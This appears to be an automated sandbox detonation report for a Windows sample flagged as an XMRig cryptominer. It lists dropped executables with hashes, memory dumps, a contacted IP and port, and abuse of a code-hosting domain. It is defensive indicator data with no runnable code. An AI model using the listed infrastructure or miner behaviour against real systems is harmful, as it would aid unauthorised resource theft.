C:\Windows\System\bSbxMjx.exe

C:\Windows\System\PWbtHIy.exe

C:\Windows\System\PWbtHIy.exe

C:\Windows\System\aPuPDEJ.exe

C:\Windows\System\aPuPDEJ.exe

C:\Windows\System\olWnLrD.exe

C:\Windows\System\olWnLrD.exe

C:\Windows\System\sJUtRGu.exe

C:\Windows\System\sJUtRGu.exe

C:\Windows\System\ndJNWJJ.exe

C:\Windows\System\ndJNWJJ.exe

C:\Windows\System\jDWoOzJ.exe

C:\Windows\System\jDWoOzJ.exe

C:\Windows\System\kAwmJhu.exe

C:\Windows\System\kAwmJhu.exe

C:\Windows\System\cwzWrzN.exe

C:\Windows\System\cwzWrzN.exe

C:\Windows\System\khnmOwE.exe

C:\Windows\System\khnmOwE.exe

C:\Windows\System\OLoupOH.exe

C:\Windows\System\OLoupOH.exe

C:\Windows\System\goLUaub.exe

C:\Windows\System\goLUaub.exe

C:\Windows\System\wpUNqTD.exe

C:\Windows\System\wpUNqTD.exe

C:\Windows\System\CsJmtSw.exe

C:\Windows\System\CsJmtSw.exe

C:\Windows\System\mhizrHS.exe

C:\Windows\System\mhizrHS.exe

C:\Windows\System\TwsDFUU.exe

C:\Windows\System\TwsDFUU.exe

C:\Windows\System\nwIxvrQ.exe

C:\Windows\System\nwIxvrQ.exe

C:\Windows\System\cOgAjMs.exe

C:\Windows\System\cOgAjMs.exe

C:\Windows\System\VuaSSOz.exe

C:\Windows\System\VuaSSOz.exe

C:\Windows\System\rRGCkGd.exe

C:\Windows\System\rRGCkGd.exe

C:\Windows\System\DobcbTW.exe

C:\Windows\System\DobcbTW.exe

C:\Windows\System\bgeMvmS.exe

C:\Windows\System\bgeMvmS.exe

C:\Windows\System\utptZCS.exe

C:\Windows\System\utptZCS.exe

C:\Windows\System\BLnzTrc.exe

C:\Windows\System\BLnzTrc.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2336-0-0x00000000000F0000-0x0000000000100000-memory.dmp

memory/2336-2-0x000000013F950000-0x000000013FD42000-memory.dmp

\Windows\system\ugdcyMP.exe

MD5 96e8b78c10087a7eede924693c09a967
SHA1 383f0140282626aba1ad03a7c4b896622cbda65e
SHA256 f0da3b126c432aa5ff9e7c53b2767864f66cce1611b446674959dbbfe0fee3b7
SHA512 8dff631651d05fcd60573542452ff314570d8f7f91732fadf2c80a7af2cb4e4bb9023b831c0d46f2ca594f9d43caeaf16199b082a5a3eccbd8faa8fb30d5873a

memory/2184-9-0x000000013F1B0000-0x000000013F5A2000-memory.dmp

memory/2336-8-0x000000013F1B0000-0x000000013F5A2000-memory.dmp

C:\Windows\system\teDwzKF.exe

MD5 8717036fbaca14dbf2d686ff0f1874ae
SHA1 4e511a594c90619bd01c59c8691edae382627ff7
SHA256 0fe5b6c99ffcb64112bf3d2f9967a3c581979bcd8ea8886c751ab682f4d0522c
SHA512 e6c2572ff64646f56f4e45bdc86a7130c161ce3000b69515e3afe94c7eee3c7073cc20634a8cd37f766bd8806f849e1a59e1dc1bb56ebfac437811dab1caa83e

C:\Windows\system\SYKMGRl.exe

MD5 c34dbe9edcdfb8d352059cdde5c1b176
SHA1 eee5dff41527da1938e12162db27aaadb6b63db3
SHA256 74a8536433336433a77ab0b56bb5a9e1a20e5777adb4e67f274d895fe7146e05
SHA512 7d89ddc844c169b49d9b9fd91adf861cfb39d0d1d01f7b9e516139d5fcc8b6c096a7211a479bfa3b545c7fd4b2b9185db88db33e6f046971d0893bca93cc38e4

C:\Windows\system\jTcWSGa.exe

MD5 9930ddd284edc9d0dcbd03278b529993
SHA1 7f57a861ea2c4ae1b7571c33e3349646e46ec5da
SHA256 b9d5b200cf7e5cb60904e970588fcdb172159c44ea6b4ed5031699ac8c711214
SHA512 b8c5b241232d5c98188825733d0a1b36c2734db00f7ef34f5156fb89e49d52d43433fc057fe618972894e331ebf62d9d53835278cd11a821c525f707bd80581a

C:\Windows\system\sgDfEfG.exe

MD5 3cc2395eda27e09b762b1b1a38fbac26
SHA1 0ebaf47df8406a182c36b9f8392764fac69bae8d
SHA256 ca4b5195dd9849833495691bb02d1ea692a32327a3111886fddb7b4c99997179
SHA512 096d72ab06883e663aee309f57edb9ebc0dce84d053223905c7932b96ea8911fbfccfe4c9f8098116364ca2c27c71e470e4c496f3bb6280e07b50c5986b85293

\Windows\system\DUcRXOH.exe

MD5 452d6405fdf800442d3f6c71412d866e
SHA1 02938e538e4a1764b61a7a29227410d88ff782d6
SHA256 094d7a5eac97edef2bd44a8a13c84f8f019252c2ff4bd8f99f0fc85166074594
SHA512 484fc9b2ab93f24447acadce4539c0ee2846b314ee68cb9d84ee5249f59a81404239890d40567ab8dbcc2c74aed938e39b33c0c11988690b65c6adf85ff02aa4

C:\Windows\system\fcqXfls.exe

MD5 4e9776f9e8fea2f3195e5fab877557f3
SHA1 6ec7ca5d32910cc8728c33ea79d6c51a63bc6def
SHA256 c74768832d726f5427ccf81e11eca13191f5f09f8dc2a4c1fa1070f39232fe4d
SHA512 cabed86f8b316c479c72ae76720e9dd2e38426698e5701484c1b7514672bdf4c67da5e745375db46f5fd2e6f5c8620beaae59e046e404ea8434ef5271691925e

memory/1988-177-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

memory/1988-176-0x000000001B630000-0x000000001B912000-memory.dmp

memory/1988-181-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/2336-421-0x0000000002F70000-0x0000000003362000-memory.dmp

memory/2256-420-0x000000013FDF0000-0x00000001401E2000-memory.dmp

memory/348-419-0x000000013F5A0000-0x000000013F992000-memory.dmp

memory/2336-418-0x000000013FDF0000-0x00000001401E2000-memory.dmp

memory/2336-417-0x000000013F480000-0x000000013F872000-memory.dmp

memory/1628-416-0x000000013F850000-0x000000013FC42000-memory.dmp

memory/2440-191-0x000000013FDE0000-0x00000001401D2000-memory.dmp

memory/1988-477-0x000007FEF5510000-0x000007FEF5EAD000-memory.dmp

memory/3028-190-0x000000013F600000-0x000000013F9F2000-memory.dmp

memory/2724-189-0x000000013FE80000-0x0000000140272000-memory.dmp

memory/2848-188-0x000000013FED0000-0x00000001402C2000-memory.dmp

memory/2672-187-0x000000013F630000-0x000000013FA22000-memory.dmp

memory/2336-186-0x000000013F440000-0x000000013F832000-memory.dmp

memory/2336-185-0x0000000002F70000-0x0000000003362000-memory.dmp

memory/2336-184-0x0000000002F70000-0x0000000003362000-memory.dmp

memory/2336-183-0x0000000002F70000-0x0000000003362000-memory.dmp

memory/2336-182-0x000000013FE80000-0x0000000140272000-memory.dmp

C:\Windows\system\yEXWWEx.exe

MD5 430f97e4b0c9e4b2771781d71c422319
SHA1 c8f2c2b150ab40342a58eeafbfec728eb083e795
SHA256 58ec72abbd2c0de202d9b324659fba93d56c4bc1dcae54eed704fa583879db8d
SHA512 02f175f16c02e356c520bb634d56a41cdbc90c9e7cfffa148d0cf57a6b2b0b86ac32ba164fbb8c880f165db7ccbc6c9b6f92963ca4ef3d0ca89f107066e89b7b

C:\Windows\system\eYWkAcm.exe

MD5 c09d7f2b74e2de6b74539de83a4a2b37
SHA1 4eda87c8a58e3ceb1539ac0742d38aafdd1d2dcc
SHA256 a70f1eacf7fbfe56a27f44625c391dc16bf830a30b4d6f6e0783bb246622e446
SHA512 63b8ce4f373f58d070018302e60d2a8254e45256ac01bbf26beb4bb4990c90bc4b146e3285d7102d761a382811e23673781adf4822cff3d503b6f662727873d4

C:\Windows\system\AvxBQdq.exe

MD5 8016a8d98067c3af553a1cde90a8984f
SHA1 e9ceaceb5551d18ff0ec917d5d2064ee2bb95a8c
SHA256 feea48e88e8228ade675136bb6e4a9a6fd93b428aa2d009be8df9e25e5c2e1c1
SHA512 b99e0a04df25a200d81911a54bc3431ac9b1e7c0406b83963ed52aa8080f42223c8cc2fb93ecc1fc08ce9403e0419356daea1cda89df8562e773be6d21683814

\Windows\system\dYvTSwE.exe

MD5 43bc8fec526ac048d539163d34c103a3
SHA1 331e861a2db45a2a435fb30baa6cee1a5c68ff3b
SHA256 6e0165e05566c1a359150ad29eb2f4468bb18c7fa2db768d53932c9010c75691
SHA512 546c3d9d06ce97718f27809d71c8273536dbd7cbdb2892db23a3766906b469f391c5b88381ca7480afacfd0af423d944d9d4985375540bec124c90ee2f64846c

C:\Windows\system\jLZiWFK.exe

MD5 325e76378669c6c0f14bee661f5d7091
SHA1 0cd09bff16ee3da8a7fb8426f9afa427db6a1ad5
SHA256 99b574e54acebe0032c202f3a5bfd63ea1fa47d58d5f9631a6501cabbb755ef6
SHA512 d57489be66fac9c0a8fa73ee9e58e4f97db92eefe543a2c02fc4b7dc0fb194130cae635d6c923398cdde423ccc3d8c78371c403340439e31307fb9076df34764

\Windows\system\DNkGzzA.exe

MD5 c4b737af41cd82a815ef9dfac2360496
SHA1 4fcf8accf3ff6228257554924136f4c24d996a9b
SHA256 da098b7d92c3949baf69a6bacc24ce1eb7881825c2abe3b53d98ab9f5bf50e7f
SHA512 fe5a7afa93497e726ac6232cb81bca5c7d4231770c508b664b69636cfe768333db5a528c51feb6983990426de256812d673d3f9ca8e00ad7cc7bd2c09d742f7f

C:\Windows\system\yQATNuk.exe

MD5 5bb1994d4eba610eaea384cad2fdc461
SHA1 3eb848cdab918e7c72f0e51579b4c107426f4033
SHA256 8e820877cc2cac7be908fd31eba3c9e25c2a919d5210f6c827a9ee1bb1ac2439
SHA512 acc65dd315630d80eeed93db686a53a35159d2084231f56267d6e4bf8083ea6763fe68954c78e2828fc3e2ba3c334dc6672cb2e87bd0ea62df3082d38f848992

C:\Windows\system\OEcZzup.exe

MD5 b9ced59a073749dfe77526875dc5317c
SHA1 6882d8a50683761685f9acef11b04cb25c95aa36
SHA256 50752ae956593af130dcfdf702431d419f9b752443c42c09c2a10c8d62dcebc4
SHA512 5276841bc839ae5ee99e176d0002332af72e44e5e11709980c38acbd089f8534ab11cf82c316fef45723a0121c8a722939ba0d2bdcdc46ec2a586f0046812b9d

\Windows\system\EiiDYHh.exe

MD5 3a494c7e8a5c1b68398a7bee7a6ca182
SHA1 453095e031d2b96d11dadba07ca44d91576ffcc9
SHA256 6749295f522d6a1c950685d465c4e713eb79d8cea29162535d46ec30998e3c6a
SHA512 14ea51682b93cd363284665279afaa49312dea945dc7b19e68d276a54d21288948de02afeece9643012535c32189d475ee9de90745d452f1e26308ba9dfbf0a3

\Windows\system\TycqBwB.exe

MD5 d0db7903ce26a1e6a9708a2a46532d8f
SHA1 474f2e306da19314fb65c929debbc61a185be821
SHA256 e2d0d693d9aa807548ddde402a0b458bc674bebfed7992e855fdf7e6c60db50e
SHA512 a223d2a80a9789ab8f8824f998f2d3beb71127bcf218d4f2ebe19865291e19550ccb4cc5fd878d345f35bd8fb6aa970f6740f068bb53c1235e1e7bf2d5b2bb37

C:\Windows\system\WtEsAsF.exe

MD5 e096fc9a97dc069d6fe59c7021fa8a70
SHA1 99ada3adcd19f86d318c5b6d0a4cb9132a9b15ff
SHA256 e572a93d75c2b4409518a1101921b48d4b409a9930721aade89aabd13841bdc9
SHA512 21ce1c9d14110b7ec58afe6cd2f1894706ce51de81c1129fd8c9a9deee3473d19e63acd2f029dd1937a03ce313ae381239e6c0d79359b4d4eb6c6a064d1606b8

C:\Windows\system\kjcOpML.exe

MD5 cce046a6c2642fa56b818a34ed06090c
SHA1 06fb2536101f7046ec44ab47dfc5355fd7edcd3f
SHA256 e6e30da0a7d2546ea59a25e9eadede89f32006d0a5b82a43089374af328dba6f
SHA512 bb4e6c3410618681e10897dfd45f09ed204fcb512ef335d1143a55fc4237be2673a427d79953ca3b5f2c97032ac2fea8d8248e99022c5041f27f5790790732d4

\Windows\system\ahoTtEV.exe

MD5 6c6db2512beb148973b9f9720eca02be
SHA1 96ab299da66a1f7b49eb6ef5ebd51aa0f42fddad
SHA256 7c58cab6cd1748f801c0755db1c61169d3b0fbecdd6b837b9034cebf7283c7a8
SHA512 e9d123b1cee1dd3038d90f7f124cab0839c5f6d874ac28885c7249e6fe2161e69a05c7a1ccd38d4dcc2eff63e3c23135ca8a500ffab944bb506020e0d872ccc0

memory/1988-52-0x000007FEF57CE000-0x000007FEF57CF000-memory.dmp

C:\Windows\system\sNqMiiZ.exe

MD5 35631b5ee9aba7ae2cce9b5c29f6b316
SHA1 4384b34aa6a629a7535048bb935970233744c855
SHA256 f8325b03499071e8339d0c43db61cf88c3695f53a9258c5a5a62b54275e44d75
SHA512 48066be05d4ae7864de607c9a113f077d4d20318b362f52d14fb73b97050ddfff793eedcd5f13dcfed56955b62166f6f73d77677be6063e1ef85cba0fa2a22bb

memory/1988-31-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2336-29-0x0000000002F70000-0x0000000003362000-memory.dmp

C:\Windows\system\jxAvUkM.exe

MD5 d957659d62b42fb00a2d8abaccfba659
SHA1 981539aacd354f05bb062346eb765432c4e0b57c
SHA256 8bba222653bf2c9cb67e840c0349b1044588016ac2bc94d21bcc1071d39a40b0
SHA512 b2b554020f6ede8bdc6e82d498f26223cb1d396cd301b6663b282a9a728653a3487cc22ffacc7905e06a3786c92a7bd1d94ef013c81429673f82667d9bd90411

C:\Windows\system\zrKPWlk.exe

MD5 6d807338de6d26994811b15f36b57305
SHA1 c6332b4bca725ab34ba42fa4839194907ed3f337
SHA256 005f5fe88dc29ccf92fa64171089ec3e3394fcba00aea79528ca7f3aa7d9e190
SHA512 af391857bb4a143d522a1718bf5a658e40649c50659e7d647c57258054fab6c535c2f0788e62f08a1c11a7f1c47ae92a9ae9da7fca40060ba3bedeed990252ea

C:\Windows\system\wcuFeQH.exe

MD5 ac896293d0486301226bb90736bcb004
SHA1 d43001138736b8070939fe4221300cf0f6e339a2
SHA256 9859849508640aa54ba990e635dce07f865ea5879a04c321e27babe8fb51cdf2
SHA512 cb0215509d4b722ae19744f78aa9a5ca97fa1e816d64f7292965a48fc06f79cad910685082d39c4dff67310cca39b0d35fec81347deda7a61c23429178b004e8

C:\Windows\system\nKIPfDj.exe

MD5 0da186a980482b6095c53874ce399418
SHA1 cb1f059b0556ed4a4b7f096ae61d991e2679bd41
SHA256 d92acb157102abdff6563c367c89355447c35f6637c689af45ae27a4870c141b
SHA512 aab89bbefed7edea851e7e8cfd61b7e533c842ea9ac01b2ab8a02e05ee138e5447db6e1a8b72bdbb0d7974dfe448cab77599573a8b06dd5aa562c3e12ed69f12

C:\Windows\system\yyIEfSj.exe

MD5 fa968c9caf59163f88658610e0469745
SHA1 85c2f3a9c27ed44cdf42d1f3a2b912f0c9a454c5
SHA256 1f0fdd373668bf53a62164947a8ba3c344e0f3623470e166b282b98fbcc5d9c1
SHA512 ab82ad4e437e732e7f3b33f678ff50ee155c129835ffd9aaa521d21c3177b4c9006388a403ff230f6f0db26c572f2cb754d3a10e7857b52da746fb28d0985697

C:\Windows\system\dJDbpxk.exe

MD5 39735a1522362c3617dbacd2a573cb7f
SHA1 8407ae7b39f47cfe9688060a58b1fe09dc1b258d
SHA256 c61d284da827833532ea95fbb82a8aacdb1456986441b951ee0e84dc95573705
SHA512 265ee6288ecee0fffc173273c5940923e019137ee8b163bee14edfa831076ba4634fdb3a7420da40fc4b70849e5e0c7121fc743ae83ab19d97681b2dd5500ddb

C:\Windows\system\MABiMax.exe

MD5 0fc6e55a20cfab02db98309cb946f5cd
SHA1 4b9c836e7662bb6b74197890f1d4fc7f00f4f127
SHA256 c3c6f01bd29062ccf5e4425b70c2e6bdd3998bd9fb9f033c4568f9417b98bd43
SHA512 ee1f7844e29cf49d45ee64ea73b34b3e810545e50b0bad0465e8343a7cc1afcc19d8d796bb69c963e701c18335b3fb3d39c959a34ffe4a514eb4cf1b1d5e905e

C:\Windows\system\MSaQWKO.exe

MD5 c7fc6a6dcd404054d68901e977eedb27
SHA1 9bfabcd1b88a35d2f56290045723d139685e6d63
SHA256 9fe79a1aa74ff6d63a26ea13a6b56360ed100d6773e3d3bb6aabbab4abfda029
SHA512 6ae3f2be420a7d7467cc830c749bd303ebfeffa2badb96756779f61adfc8e71e14ef5af45f8cf7da3476ca931c31796ccadfd80482261a7fe30660e37bd9c349

C:\Windows\system\DziatgR.exe

MD5 28549a8f019fd21db17992bf7d67975a
SHA1 1758b9289ec499862e328d291934abb49e12be2e
SHA256 fdddc982d9ebe58ab86067c13319d3b5e212d67401dacc764300b88167710d55
SHA512 efcedd11e58d66f9cd95161f322574414b2aa0c5807bc5a4ceee6f32644c2fbac6e39dd6ddab22a3bf7bfd6de77bef4e1f4c3083c2a3c75c672307e37820d3c0

C:\Windows\system\AGVmJaZ.exe

MD5 350da73866f626b1e7c029e73d90a6d7
SHA1 3ba532cf85ff20de914a251981cb2e571897311e
SHA256 db8848e8bdcb17e9610c7db00c946a8a431253a511a9f7534f93828988b3990d
SHA512 7d30ddcf213f41e6a820d5b4480cb42c3ca104bb32b6120b49f893437d8db85af47f64059faede7a0416f39f50cbc5cb1ee6147a2d79cf917e879adccacc7388

C:\Windows\system\JfgLGHW.exe

MD5 8e19b3de8639ca75c2d7373a8a969e3f
SHA1 530a7aec217f22622a37ba772094f01b4c333971
SHA256 8c06bddf2ba061eb215467a33cace6ff3c3c9dbf6cb78b784fd0102249b63fb7
SHA512 46022799ddd99743f57542bda549de7acccbfc1b10fa8447aaccd38b147f17d3eae06e2ba4d2cfe40e5fd6f69da9eb97ea9dbe4f4eee9bf0c074f0fb9078e815

memory/1988-42-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2336-41-0x000000013FED0000-0x00000001402C2000-memory.dmp

memory/2336-20-0x0000000002F70000-0x0000000003362000-memory.dmp

memory/2184-6102-0x000000013F1B0000-0x000000013F5A2000-memory.dmp

memory/2848-6151-0x000000013FED0000-0x00000001402C2000-memory.dmp

memory/2724-6152-0x000000013FE80000-0x0000000140272000-memory.dmp

memory/2440-6150-0x000000013FDE0000-0x00000001401D2000-memory.dmp

memory/2672-6154-0x000000013F630000-0x000000013FA22000-memory.dmp

memory/3028-6257-0x000000013F600000-0x000000013F9F2000-memory.dmp

memory/348-6265-0x000000013F5A0000-0x000000013F992000-memory.dmp

memory/1628-6319-0x000000013F850000-0x000000013FC42000-memory.dmp

C:\Windows\system\gXhJSfq.exe

MD5 c5e27ce919145287b980725b52e54907
SHA1 ab157ce82d15d56ae44564bd4cbd9ec4f6285a7b
SHA256 43f3c75ca449365d9d7fc650380ff1278890ff547649b0a0e479b26abd579a36
SHA512 ae149a21b61ebd0a82d088f9b4be0bb3c637f82d649107cbb37e57a5d19f70381d81023215906ea7f2b4dcf8d488521b88fc591e46f8ae792bc784989acac17d

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 13:05

Reported

2024-06-13 13:08

Platform

win10v2004-20240508-en

Max time kernel

62s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\mLnIUqh.exe N/A
N/A N/A C:\Windows\System\DRvqfYQ.exe N/A
N/A N/A C:\Windows\System\rPhRvKm.exe N/A
N/A N/A C:\Windows\System\ubfKyDR.exe N/A
N/A N/A C:\Windows\System\jFIeHxi.exe N/A
N/A N/A C:\Windows\System\YfWCkFP.exe N/A
N/A N/A C:\Windows\System\xPHatBi.exe N/A
N/A N/A C:\Windows\System\AhfufJT.exe N/A
N/A N/A C:\Windows\System\TYrDlQJ.exe N/A
N/A N/A C:\Windows\System\XTNJBar.exe N/A
N/A N/A C:\Windows\System\IorpMDV.exe N/A
N/A N/A C:\Windows\System\lzcWmVp.exe N/A
N/A N/A C:\Windows\System\CgsQdua.exe N/A
N/A N/A C:\Windows\System\jNECHWu.exe N/A
N/A N/A C:\Windows\System\qiXmQXA.exe N/A
N/A N/A C:\Windows\System\KBeeiyr.exe N/A
N/A N/A C:\Windows\System\ZGetBhG.exe N/A
N/A N/A C:\Windows\System\pefFRsC.exe N/A
N/A N/A C:\Windows\System\UVCrIDv.exe N/A
N/A N/A C:\Windows\System\EWyVhSG.exe N/A
N/A N/A C:\Windows\System\RePWsaj.exe N/A
N/A N/A C:\Windows\System\SpBLqEC.exe N/A
N/A N/A C:\Windows\System\nzVZUQA.exe N/A
N/A N/A C:\Windows\System\TVcThEj.exe N/A
N/A N/A C:\Windows\System\SWEYvlD.exe N/A
N/A N/A C:\Windows\System\SOqYhVS.exe N/A
N/A N/A C:\Windows\System\vPfDbLc.exe N/A
N/A N/A C:\Windows\System\fPKofCZ.exe N/A
N/A N/A C:\Windows\System\ohokUdJ.exe N/A
N/A N/A C:\Windows\System\ENTEtSo.exe N/A
N/A N/A C:\Windows\System\SpRceJo.exe N/A
N/A N/A C:\Windows\System\rragGEt.exe N/A
N/A N/A C:\Windows\System\mJkqKpa.exe N/A
N/A N/A C:\Windows\System\tfHtKyA.exe N/A
N/A N/A C:\Windows\System\JNxVXhR.exe N/A
N/A N/A C:\Windows\System\UYUAMRF.exe N/A
N/A N/A C:\Windows\System\gLqXpKJ.exe N/A
N/A N/A C:\Windows\System\dnrcjnc.exe N/A
N/A N/A C:\Windows\System\dyneJbh.exe N/A
N/A N/A C:\Windows\System\EZxRXMG.exe N/A
N/A N/A C:\Windows\System\FxEQyjr.exe N/A
N/A N/A C:\Windows\System\ImaAgBs.exe N/A
N/A N/A C:\Windows\System\TilSYam.exe N/A
N/A N/A C:\Windows\System\obRaRIO.exe N/A
N/A N/A C:\Windows\System\bfvnlnd.exe N/A
N/A N/A C:\Windows\System\oNIKJDw.exe N/A
N/A N/A C:\Windows\System\ROdFZMn.exe N/A
N/A N/A C:\Windows\System\ILfgfLV.exe N/A
N/A N/A C:\Windows\System\erOqubK.exe N/A
N/A N/A C:\Windows\System\bPGKoNc.exe N/A
N/A N/A C:\Windows\System\SnKeOOS.exe N/A
N/A N/A C:\Windows\System\ZewsToJ.exe N/A
N/A N/A C:\Windows\System\xhLUtYT.exe N/A
N/A N/A C:\Windows\System\wfZxASb.exe N/A
N/A N/A C:\Windows\System\xQOQncf.exe N/A
N/A N/A C:\Windows\System\VNdxGSY.exe N/A
N/A N/A C:\Windows\System\UbzrNcX.exe N/A
N/A N/A C:\Windows\System\NwJOvXT.exe N/A
N/A N/A C:\Windows\System\YxkXuuq.exe N/A
N/A N/A C:\Windows\System\exisjIw.exe N/A
N/A N/A C:\Windows\System\bTZSkmS.exe N/A
N/A N/A C:\Windows\System\UdbHaJi.exe N/A
N/A N/A C:\Windows\System\MzzPSJy.exe N/A
N/A N/A C:\Windows\System\PemyOFh.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\CmiCrYj.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JigMXbC.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wUUlUvN.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qHtSRLA.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UCqXEIg.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AePSrzt.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KWwszDi.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WXiVDex.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ezInInJ.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CLeKnjF.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vZSHoxY.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sXLpfQO.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pteElIE.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qyywsAI.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EGjBpzq.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DdPTaCD.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WNboewD.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AUiGuyq.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SlPaHJm.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YnSwQFt.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RwedeUB.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZgbJWuw.exe C:\Users\Admin\AppData\Local\Temp\7e737ca2ef286ec2522c7bcf3f9fa2c0_NeikiAnalytics.exe N/A
